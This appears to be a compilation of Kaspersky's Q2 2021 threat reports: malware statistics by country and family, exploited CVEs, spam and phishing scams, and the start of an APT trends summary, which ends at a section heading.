To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country.

Geography of financial malware attacks, Q2 2021 (download)

Top 10 countries by share of attacked users

Country* %** 1 Turkmenistan 5.8 2 Tajikistan 5.0 3 Afghanistan 4.2 4 Uzbekistan 3.3 5 Lithuania 2.9 6 Sudan 2.8 7 Paraguay 2.5 8 Zimbabwe 1.6 9 Costa Rica 1.5 10 Yemen 1.5

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

Last quarter, as per tradition, the most widespread family of bankers was ZeuS/Zbot (17.8%), but its share in Q2 almost halved, by 13 p.p. Second place again went to the CliptoShuffler family (9.9%), whose share also fell, by 6 p.p. The Top 3 is rounded out by SpyEye (8.8%), which added 5 p.p., climbing from the eighth place. Note the disappearance of Emotet from the Top 10, which was predictable given the liquidation of its infrastructure in the previous quarter.

Top 10 banking malware families

Name Verdicts %* 1 Zbot Trojan.Win32.Zbot 17.8 2 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 9.9 3 SpyEye Trojan-Spy.Win32.SpyEye 8.8 4 Trickster Trojan.Win32.Trickster 5.5 5 RTM Trojan-Banker.Win32.RTM 3.8 6 Danabot Trojan-Banker.Win32.Danabot 3.6 7 Nimnul Virus.Win32.Nimnul 3.3 8 Cridex Backdoor.Win32.Cridex 2.3 9 Nymaim Trojan.Win32.Nymaim 1.9 10 Neurevt Trojan.Win32.Neurevt 1.6

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Ransomware programs Quarterly trends and highlights Attack on Colonial Pipeline and closure of DarkSide

Ransomware attacks on large organizations continued in Q2. Perhaps the most notable event of the quarter was the attack by the DarkSide group on Colonial Pipeline, one of the largest fuel pipeline operators in the US. The incident led to fuel outages and a state of emergency in four states. The results of the investigation, which involved the FBI and several other US government agencies, was reported to US President Joe Biden.

For the cybercriminals, this sudden notoriety proved unwelcome. In their blog, DarkSide’s creators heaped the blame on third-party operators. Another post was published stating that DarkSide’s developers had lost access to part of their infrastructure and were shutting down the service and the affiliate program.

Another consequence of this high-profile incident was a new rule on the Russian-language forum XSS, where many developers of ransomware, including REvil (also known as Sodinokibi or Sodin), LockBit and Netwalker, advertise their affiliate programs. The new rule forbade the advertising and selling of any ransomware programs on the site. The administrators of other forums popular with cybercriminals took similar decisions.

Closure of Avaddon

Another family of targeted ransomware whose owners shut up shop in Q2 is Avaddon. At the same time as announcing the shutdown, the attackers provided Bleeping Computer with the decryption keys.

Clash with Clop

Ukrainian police searched and arrested members of the Clop group. Law enforcement agencies also deactivated part of the cybercriminals’ infrastructure, which did not, however, stop the group’s activities.

Attacks on NAS devices

In Q2, cybercriminals stepped up their attacks on network-attached storage (NAS) devices. There appeared the new Qlocker family, which packs user files into a password-protected 7zip archive, plus our old friends ech0raix and AgeLocker began to gather steam.

Number of new ransomware modifications

In Q2 2021, we detected 14 new ransomware families and 3,905 new modifications of this malware type.

Number of new ransomware modifications, Q2 2020 — Q2 2021 (download)

Number of users attacked by ransomware Trojans

In Q2 2021, Kaspersky products and technologies protected 97,451 users from ransomware attacks.

Number of unique users attacked by ransomware Trojans, Q2 2021 (download)

Geography of ransomware attacks

Geography of attacks by ransomware Trojans, Q2 2021 (download)

Top 10 countries attacked by ransomware Trojans

Country* %** 1 Bangladesh 1.85 2 Ethiopia 0.51 3 China 0.49 4 Pakistan 0.40 5 Egypt 0.38 6 Indonesia 0.36 7 Afghanistan 0.36 8 Vietnam 0.35 9 Myanmar 0.35 10 Nepal 0.33

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country.

Top 10 most common families of ransomware Trojans Name Verdicts %* 1 WannaCry Trojan-Ransom.Win32.Wanna 20.66 2 Stop Trojan-Ransom.Win32.Stop 19.70 3 (generic verdict) Trojan-Ransom.Win32.Gen 9.10 4 (generic verdict) Trojan-Ransom.Win32.Crypren 6.37 5 (generic verdict) Trojan-Ransom.Win32.Phny 6.08 6 (generic verdict) Trojan-Ransom.Win32.Encoder 5.87 7 (generic verdict) Trojan-Ransom.Win32.Agent 5.19 8 PolyRansom/VirLock Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom 2.39 9 (generic verdict) Trojan-Ransom.Win32.Crypmod 1.48 10 (generic verdict) Trojan-Ransom.MSIL.Encoder 1.26

* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware.

Miners Number of new miner modifications

In Q2 2021, Kaspersky solutions detected 31,443 new modifications of miners.

Number of new miner modifications, Q2 2021 (download)

Number of users attacked by miners

In Q2, we detected attacks using miners on the computers of 363,516 unique users of Kaspersky products worldwide. At the same time, the number of attacked users gradually decreased during the quarter; in other words, the downward trend in miner activity returned.

Number of unique users attacked by miners, Q2 2021 (download)

Geography of miner attacks

Geography of miner attacks, Q2 2021 (download)

Top 10 countries attacked by miners

Country* %** 1 Afghanistan 3.99 2 Ethiopia 2.66 3 Rwanda 2.19 4 Uzbekistan 1.61 5 Mozambique 1.40 6 Sri Lanka 1.35 7 Vietnam 1.33 8 Kazakhstan 1.31 9 Azerbaijan 1.21 10 Tanzania 1.19

* Excluded are countries with relatively few users of Kaspersky products (under 50,000).
** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyberattacks

Q2 2021 injected some minor changes into our statistics on exploits used by cybercriminals. In particular, the share of exploits for Microsoft Office dropped to 55.81% of the total number of threats of this type. Conversely, the share of exploits attacking popular browsers rose by roughly 3 p.p. to 29.13%.

Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2021 (download)

Microsoft Office exploits most often tried to utilize the memory corruption vulnerability CVE-2018-0802. This error can occur in the Equation Editor component when processing objects in a specially constructed document, and its exploitation causes a buffer overflow and allows an attacker to execute arbitrary code. Also seen in Q2 was the similar vulnerability CVE-2017-11882, which causes a buffer overflow on the stack in the same component. Lastly, we spotted an attempt to exploit the CVE-2017-8570 vulnerability, which, like other bugs in Microsoft Office, permits the execution of arbitrary code in vulnerable versions of the software.

Q2 2021 was marked by the emergence of several dangerous vulnerabilities in various versions of the Microsoft Windows family, many of them observed in the wild. Kaspersky alone found three vulnerabilities used in targeted attacks:

  • CVE-2021-28310 — an out-of-bounds (OOB) write vulnerability in the Microsoft DWM Core library used in Desktop Window Manager. Due to insufficient checks in the data array code, an unprivileged user using the DirectComposition API can write their own data to the memory areas they control. As a result, the data of real objects is corrupted, which, in turn, can lead to the execution of arbitrary code;
  • CVE-2021-31955 — an information disclosure vulnerability that exposes information about kernel objects. Together with other exploits, it allows an intruder to attack a vulnerable system;
  • CVE-2021-31956 — a vulnerability in the ntfs.sys file system driver. It causes incorrect checking of transferred sizes, allowing an attacker to inflict a buffer overflow by manipulating parameters.

You can read more about these vulnerabilities and their exploitation in our articles PuzzleMaker attacks with Chrome zero-day exploit chain and Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild.

Other security researchers found a number of browser vulnerabilities, including:

  • CVE-2021-33742 — a bug in the Microsoft Trident browser engine (MSHTML) that allows writing data outside the memory of operable objects;
  • Three Google Chrome vulnerabilities found in the wild that exploit bugs in various browser components: CVE-2021-30551 — a data type confusion vulnerability in the V8 scripting engine; CVE-2021-30554 — a use-after-free vulnerability in the WebGL component; and CVE-2021-21220 — a heap corruption vulnerability;
  • Three vulnerabilities in the WebKit browser engine, now used mainly in Apple products (for example, the Safari browser), were also found in the wild: CVE-2021-30661 — a use-after-free vulnerability; CVE-2021-30665 — a memory corruption vulnerability; and CVE-2021-30663 — an integer overflow vulnerability.

All of these vulnerabilities allow a cybercriminal to attack a system unnoticed if the user opens a malicious site in an unpatched browser.

In Q2, two similar vulnerabilities were found (CVE-2021-31201 and CVE-2021-31199), exploiting integer overflow bugs in the Microsoft Windows Cryptographic Provider component. Using these vulnerabilities, an attacker could prepare a special signed document that would ultimately allow the execution of arbitrary code in the context of an application that uses the vulnerable library.

But the biggest talking point of the quarter was the critical vulnerabilities CVE-2021-1675 and CVE-2021-34527 in the Microsoft Windows Print Spooler, in both server and client editions. Their discovery, together with a proof of concept, caused a stir in both the expert community and the media, which dubbed one of the vulnerabilities PrintNightmare. Exploitation of these vulnerabilities is quite trivial, since Print Spooler is enabled by default in Windows, and the methods of compromise are available even to unprivileged users, including remote ones. In the latter case, the RPC mechanism can be leveraged for compromise. As a result, an attacker with low-level access can take over not only a local machine, but also the domain controller, if these systems have not been updated, or available risk mitigation methods against these vulnerabilities have not been applied.

Among the network threats in Q2 2021, attempts to brute-force passwords in popular protocols and services (RDP, SSH, MSSQL, etc.) are still current. Attacks using EternalBlue, EternalRomance and other such exploits remain prevalent, although their share is gradually shrinking. New attacks include CVE-2021-31166, a vulnerability in the Microsoft Windows HTTP protocol stack that causes a denial of service during processing of web-server requests. To gain control over target systems, attackers are also using the previously found NetLogon vulnerability (CVE-2020-1472) and, for servers running Microsoft Exchange Server, vulnerabilities recently discovered while researching targeted attacks by the HAFNIUM group.

Attacks on macOS

As for threats to the macOS platform, Q2 will be remembered primarily for the appearance of new samples of the XCSSET Trojan. Designed to steal data from browsers and other applications, the malware is notable for spreading itself through infecting projects in the Xcode development environment. The Trojan takes the form of a bash script packed with the SHC utility, allowing it to evade macOS protection, which does not block script execution. During execution of the script, the SHC utility uses the RC4 algorithm to decrypt the payload, which, in turn, downloads additional modules.

Top 20 threats for macOS

Verdict %* 1 AdWare.OSX.Pirrit.j 14.47 2 AdWare.OSX.Pirrit.ac 13.89 3 AdWare.OSX.Pirrit.o 10.21 4 AdWare.OSX.Pirrit.ae 7.96 5 AdWare.OSX.Bnodlero.at 7.94 6 Monitor.OSX.HistGrabber.b 7.82 7 Trojan-Downloader.OSX.Shlayer.a 7.69 8 AdWare.OSX.Bnodlero.bg 7.28 9 AdWare.OSX.Pirrit.aa 6.84 10 AdWare.OSX.Pirrit.gen 6.44 11 AdWare.OSX.Cimpli.m 5.53 12 Trojan-Downloader.OSX.Agent.h 5.50 13 Backdoor.OSX.Agent.z 4.64 14 Trojan-Downloader.OSX.Lador.a 3.92 15 AdWare.OSX.Bnodlero.t 3.64 16 AdWare.OSX.Bnodlero.bc 3.36 17 AdWare.OSX.Ketin.h 3.25 18 AdWare.OSX.Bnodlero.ay 3.08 19 AdWare.OSX.Pirrit.q 2.84 20 AdWare.OSX.Pirrit.x 2.56

* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked.

As in the previous quarter, a total of 15 of the Top 20 threats for macOS are adware programs. The Pirrit and Bnodlero families have traditionally stood out from the crowd, with the former accounting for two-thirds of the total number of threats.

Geography of threats for macOS

Geography of threats for macOS, Q2 2021 (download)

Top 10 countries by share of attacked users

Country* %** 1 India 3.77 2 France 3.67 3 Spain 3.45 4 Canada 3.08 5 Italy 3.00 6 Mexico 2.88 7 Brazil 2.82 8 USA 2.69 9 Australia 2.53 10 Great Britain 2.33

* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000).
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

In Q2 2021, first place by share of attacked users went to India (3.77%), where adware applications from the Pirrit family were most frequently encountered. A comparable situation was observed in France (3.67%) and Spain (3.45%), which ranked second and third, respectively.

IoT attacks IoT threat statistics

In Q2 2021, as before, most of the attacks on Kaspersky traps came via the Telnet protocol.

Telnet 70.55% SSH 29.45%

Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q2 2021

The statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.

Telnet 63.06% SSH 36.94%

Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2021

Top 10 threats delivered to IoT devices via Telnet

Verdict %* 1 Backdoor.Linux.Mirai.b 30.25% 2 Trojan-Downloader.Linux.NyaDrop.b 27.93% 3 Backdoor.Linux.Mirai.ba 5.82% 4 Backdoor.Linux.Agent.bc 5.10% 5 Backdoor.Linux.Gafgyt.a 4.44% 6 Trojan-Downloader.Shell.Agent.p 3.22% 7 RiskTool.Linux.BitCoinMiner.b 2.90% 8 Backdoor.Linux.Gafgyt.bj 2.47% 9 Backdoor.Linux.Mirai.cw 2.52% 10 Backdoor.Linux.Mirai.ad 2.28%

* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats.

Detailed IoT threat statistics are published in our Q2 2021 DDoS report: https://securelist.com/ddos-attacks-in-q2-2021/103424/#attacks-on-iot-honeypots

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that serve as sources of web-based attacks: Top 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted.

In Q2 2021, Kaspersky solutions blocked 1,686,025,551 attacks from online resources located across the globe. 675,832,360 unique URLs were recognized as malicious by Web Anti-Virus components.

Distribution of web-attack sources by country, Q2 2021 (download)

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users** 1 Belarus 23.65 2 Mauritania 19.04 3 Moldova 18.88 4 Ukraine 18.37 5 Kyrgyzstan 17.53 6 Algeria 17.51 7 Syria 15.17 8 Uzbekistan 15.16 9 Kazakhstan 14.80 10 Tajikistan 14.70 11 Russia 14.54 12 Yemen 14.38 13 Tunisia 13.40 14 Estonia 13.36 15 Latvia 13.23 16 Libya 13.04 17 Armenia 12.95 18 Morocco 12.39 19 Saudi Arabia 12.16 20 Macao 11.67

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

On average during the quarter, 9.43% of computers of Internet users worldwide were subjected to at least one Malware-class web attack.

Geography of web-based malware attacks, Q2 2021 (download)

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

In Q2 2021, our File Anti-Virus detected 68,294,298 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the Malware class; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Turkmenistan 49.38 2 Tajikistan 48.11 3 Afghanistan 46.52 4 Uzbekistan 44.21 5 Ethiopia 43.69 6 Yemen 43.64 7 Cuba 38.71 8 Myanmar 36.12 9 Syria 35.87 10 South Sudan 35.22 11 China 35.14 12 Kyrgyzstan 34.91 13 Bangladesh 34.63 14 Venezuela 34.15 15 Benin 32.94 16 Algeria 32.83 17 Iraq 32.55 18 Madagascar 31.68 19 Mauritania 31.60 20 Belarus 31.38

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

Geography of local infection attempts, Q2 2021 (download)

On average worldwide, Malware-class local threats were recorded on 15.56% of users’ computers at least once during the quarter. Russia scored 17.52% in this rating.

2021. augusztus 5.

Spam and phishing in Q2 2021

Quarterly highlights The corporate sector

In Q2 2021, corporate accounts continued to be one of the most tempting targets for cybercriminals. To add to the credibility of links in emails, scammers imitated mailings from popular cloud services. This technique has been used many times before. A fake notification about a Microsoft Teams meeting or a request to view an important document traditionally takes the victim to a phishing login page asking for corporate account credentials.

Cybercriminals also faked emails from cloud services in schemes aimed at stealing not accounts but money. We saw, for example, spoofed messages about a comment added to a document stored in the cloud. The document itself most likely did not exist: at the other end of the link was the usual recipe for making a fast buck online by investing in Bitcoin or a similarly tempting offer. Such “offers” usually require the victim to pay a small amount upfront to claim their non-existent reward.

In addition to various cloud-related emails, we blocked messages disguised as business correspondence and containing links to malware. In particular, an email threatening legal action claimed that the victim had not paid for a completed order. To resolve the issue amicably, the recipient was asked to review the documents confirming the order completion and to settle the bill by a certain date. The documents were supposedly available via the link provided and protected by a special code. In fact, the file named “Договор №8883987726 от 10.10.2021.pdf.exe” (Agreement #8883987726 of 10.10.2021.pdf.exe) that the victim was asked to download was a malicious program known as Backdoor.Win32.RWS.a.

COVID-19 compensation fraud

In Q2 2021, scammers continued to exploit the theme of pandemic-related compensation. This time, offers of financial assistance were mostly sent in the name of government agencies. “The UK Government” and “the US Department of the Treasury” were ready to pay out special grants to all-comers. However, attempts to claim the promised handout only led to monetary loss or compromised bank card details. It goes without saying that the grants did not materialize.

It was bank card details, including CVV codes, that were the target of a gang of cybercriminals who created a fake informational website about social assistance for citizens of Belarus. To make the pages look official, the scammers described in detail the system of payouts depending on the applicant’s line of work and other conditions. The information bulletin issued in the name of the Belarus Ministry of Health clearly spelled out the payment amounts for medical staff. Workers in other fields were invited to calculate their entitled payout by clicking the Get Social Assistance button. This redirected the visitor to a page with a form for entering bank card details.

Parcel scam: buy one, get none

Unexpected parcels requiring payment by the recipient remained one of the most common tricks this past quarter. Moreover, cybercriminals became more adept at localizing their notifications: Q2 saw a surge in mass mailings in a range of languages. The reason for the invoice from the “mail company” could be anything from customs duties to shipment costs. When trying to pay for the service, as with compensation fraud, victims were taken to a fake website, where they risked not only losing the amount itself (which could be far higher than specified in the email), but also spilling their bank card details.

Mailed items were the focus of one other fraudulent scheme. Websites appeared offering people the chance to buy out others’ parcels that for some reason could not reach the intended recipients. The “service” was positioned as a lottery — the buyer paid only for the weight of the parcel (the bigger it was, the higher the price), and its contents were not disclosed. To find out what was inside, the lucky owner of the abandoned parcel had to wait for it to arrive at the specified address. Which it didn’t. According to the mail company Russian Post, when the storage period expires, registered items (parcels, letters, postcards, EMS items) are sent to the return address at the sender’s expense. If the sender does not collect the returned item within the storage period, it is considered “unclaimed” and stored for a further six months, after which it is destroyed. In other words, ownerless parcels are not sold. Therefore, any offer to buy them is evidently a scam.

New movies: pay for the pleasure of not watching

Late April saw the annual Oscars ceremony in Hollywood. Movies nominated for an Academy award naturally attract public as well as cybercriminal attention. As a consequence, fake websites popped up offering free viewings and even downloads of Oscar contenders. After launching a video, the visitor of the illegal movie theater was shown several clips of the film (usually taken from the official trailer), before being asked to pay a small subscription fee to continue watching. However, after payment of the “subscription” the movie screening did not resume; instead the attackers had a new bank account to play with.

In fact, almost any big-budget movie is accompanied by the appearance of fake websites offering video or audio content long before its official release. Kaspersky found fake sites supposedly hosting Friends: The Reunion, a special episode of the popular sitcom. Fans who tried to watch or download the long-awaited continuation were redirected to a Columbia Pictures splash screen. After a few seconds, the broadcast stopped, replaced by a request to pay a nominal fee.

Messenger spam: WhatsApp with that?

In messenger-based spam, we continued to observe common tricks to get users to part with a small amount of money. Victims were asked, for example, to take a short survey about WhatsApp and to send messages to several contacts in order to receive a prize. Another traditional scam aims to persuade the user that they are the lucky winner of a tidy sum. Both scenarios end the same way: the scammers promise a large payout, but only after receiving a small commission.

WhatsApp was bought by Facebook in 2014. In early 2021, the two companies’ symbiotic relationship became a hot topic in connection with WhatsApp’s new privacy policy, allowing the messenger to exchange user information with its parent company. Cybercriminals took advantage of the rumor mill about the two companies. They set up fake websites inviting users to a WhatsApp chat with “beautiful strangers”. But when attempting to enter the chat room, the potential victim landed on a fake Facebook login page.

Emails with a link pointing to a fake WhatsApp voice message most likely belong to the same category. By following it, the recipient risks not only handing over their personal data to the attackers, but also downloading malware to their computer or phone.

Investments and public property scams

Offers of quick earnings with minimal effort remain one of the most common types of fraud. In Q2 2021, cybercriminals diversified their easy-money schemes. Email recipients were invited to invest in natural resources (oil, gas, etc.) or cryptocurrency secured by these resources. The topic of gas surfaced also in more conventional compensation scams. To make their offers more credible, cybercriminals used the brands of large companies. Having accepted investments, the scammers and their sites quickly disappeared along with the victims’ money.

For more suspicious minds, the cybercriminals set up a fake Gazprom anti-fraud website, where they posed as company employees, promising to compensate victims’ losses. The cybercriminals claimed that those who had paid more than 60,000 rubles were entitled to compensation; however, the attacks were not targeted. Most likely, the scammers were counting on users being curious about whether they could claim compensation. Naturally, the help of the “anti-fraudsters” was not without strings attached, despite the advertised free consultation. “Clients” who filled out the form were asked to pay a small fee for the refund, whereupon the “consultants” vanished without compensating so much as a dime.

Another high-earning scam cited client payouts under VTB Invest, VTB Bank’s digital asset management solution. Using the bank’s logos, the fraudsters offered “active banking users” the opportunity to receive “payout from investors.” After filling out the application form, indicating name, phone number and email, the potential victim saw a message stating that they are to receive a certain amount of money. Although the cybercriminals assured that no commission was payable, to receive the “payout” the applicant was required to provide bank card details or deposit a small sum, ostensibly to verify the account. In other words, it was the usual scheme in a different wrapper.

Statistics: spam Proportion of spam in mail traffic

After a prolonged decline, the share of spam in global mail traffic began to grow again in Q2 2021, averaging 46.56%, up 0.89 p.p. against the previous reporting period.

Share of spam in global mail traffic, Q1 and Q2 2021 (download)

A look at the data by month shows that, having troughed in March (45.10%), the share of spam in global mail traffic rose slightly in April (45.29%), with further jumps in May (46.35%) and June (48.03%), which is comparable to Q4 2020.

Source of spam by country

The TOP 10 spam-source countries remained virtually unchanged from the first quarter. Russia (26.07%) is still in first place, its share having increased by 3.6 p.p., followed by Germany (13.97%) and the US (11.24%), whose contribution to the global flow of spam decreased slightly. China (7.78%) remains in fourth position.

Source of spam by country, Q2 2021 (download)

The Netherlands (4.52%), France (3.48%) and Spain (2.98%) held on to fifth, sixth and seventh, respectively. Only the last three positions in the TOP 10 experienced a slight reshuffle: Poland (1.69%) dropped out of the ranking, falling to 11th place, while Japan (2.53%) moved up to eighth. Brazil (2.27%) remained in ninth spot, while the last line in the ranking was claimed by India (1.70%).

Malicious mail attachments

Mail Anti-Virus blocked 34,224,215 malicious attachments in Q2, almost 4 million fewer than in the first three months of 2021.

Number of Mail Anti-Virus triggerings, Q1 and Q2 2021 (download)

Peak malicious activity came in June, when Kaspersky solutions blocked more than 12 million attachments, while May was the quietest with only 10.4 million.

Malware families

In Q2, Trojans from the Badun family (7.09%) were the most common malicious attachments in spam, with their share increased by 1.3 p.p. These malicious programs, disguised as electronic documents, are often distributed in archives. In contrast, Agesla Trojans (6.65%), which specialize in stealing credentials, shed 2.26 p.p. and dropped to second place. The Taskun family (4.25%), which exploits Windows Task Scheduler, rounds out the TOP 3. These Trojans, like Badun, are gaining popularity.

TOP 10 malware families in mail traffic, Q2 2021 (download)

Exploits for CVE-2017-11882 (4.07%), an Equation Editor vulnerability popular with cybercriminals, gave ground and dropped to fourth place. Next come malicious ISO disk images (3.29%). Sixth and eighth places were occupied by Noon spyware Trojans, which infect any (2.66%) or only 32-bit (2.47%) versions of Windows. Androm backdoors (2.55%) lie in seventh position, while the TOP 10 is rounded out by malicious documents in the SAgent (2.42%) and Agent (2.11%) families.

TOP 10 malicious attachments, Q2 2021 (download)

The TOP 10 attachments in spam differs only slightly from the ranking of malware families. The most widespread representative of Agent family fell short of the TOP 10, but the ranking did find room for a Trojan from the Crypt family (2.06%), which includes heavily obfuscated and encrypted programs.

Countries targeted by malicious mailings

More than anywhere else, Kaspersky solutions blocked malicious attachments on user devices in Spain (9.28%). The share of this country grew slightly against Q1 2021, adding 0.54 p.p. Second place was retained by Italy (6.38%), despite losing 1.21 p.p. Germany (5.26%) and Russia (5.82%) swapped places in Q2, while the UAE (5.36%) remained fourth, its share practically unchanged.

Countries targeted by malicious spam, Q2 2021 (download)

Further down in the Top 10 countries by number of users who came across malicious attachments in Q2 2021 are Vietnam (4.71%), Mexico (4.23%), Turkey (3.43%), Brazil (2.91%) and Malaysia (2.53%).

Statistics: phishing

In phishing terms, Q2 2021 was fairly uneventful. The Anti-Phishing system detected and blocked 50,398,193 attempted redirects, with only 3.87% of our users encountering such phishing links.

Geography of phishing attacks

Looking at the share of users by country on whose devices the Anti-Phishing system was triggered, we see that Brazil (6.67%), which lost first place last quarter, is back at the top. It didn’t get far ahead from Israel (6.55%) and France (6.46%), which topped the Q1 list.

Geography of phishing attacks, Q2 2021 (download)

Top-level domains

The traditional leader among top-level domain zones used by cybercriminals to post phishing pages is COM (31.67%). The ORG domain (8.79%) moved up to second place, pushing XYZ (8.51%) into third.

Top-level domain zones most commonly used for phishing, Q2 2021 (download)

The fourth most popular domain zone among cybercriminals in Q2 was China’s CN (3.77%), followed by NET (3.53%). Russia’s RU (2.98%) dropped to sixth place, and Tokelau’s TK (1.65%) to eighth. Note also the cybercriminals’ preference for international domain zones (six of the ten lines in this quarter’s ranking).

Organizations under attack

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

For the first time since the start of the pandemic, online stores (19.54%) vacated the first line in the ranking of organizations most often used by cybercriminals as bait. Global internet portals (20.85%) stepped in as this quarter’s leader. Moreover, the share of both categories increased relative to Q1: by 3.77 and 5.35 p.p., respectively. Third place belongs to banks (13.82%), which gained 3.78 p.p. in Q2.

Distribution of organizations whose users were targeted by phishers, by category, Q2 2021 (download)

Overall, the list of the most popular organization categories among cybercriminals remained practically unchanged since the previous quarter, except that the shares of instant messengers (6.27%) and social networks (7.26%) almost drew level, and phishers preferred financial services (2.09%) to IT companies (1.68%).


In Q2, as we expected, cybercriminals continued to hunt for corporate account credentials and exploit the COVID-19 theme. A curious takeaway was the spike in investment-related activity. On the whole, however, the quarter did not deliver any surprises.

As for Q3 forecasts, the share of cyberattacks on the corporate sector is likely to stay the same. This is because remote working has established a firm foothold in the labor market. Also, the COVID-19 topic is unlikely to disappear from spam. And if the current crop of vaccination and compensation scams weren’t enough, fraudsters could start utilizing newly identified strains of the virus to add variety and nowness to their schemes. What’s more, during the vacation season, pandemic or not, we expect an increase in demand for intercity and international travel; as a result, the risk of encountering fake websites when buying tickets or booking accommodation will rise. Lastly, we will likely see waves of tourist-targeted attacks during major sporting occasions, such as the Olympic Games in Japan. Such events are always accompanied by thematic spam.

2021. július 29.

APT trends report Q2 2021

For more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q2 2021.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.

The most remarkable findings

Investigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, “FourteenHi”, in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.

FourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.

Although we couldn’t directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.

Europe Russian-speaking activity

On May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven’t been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it “HotCousin”. The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.

Chinese-speaking activity

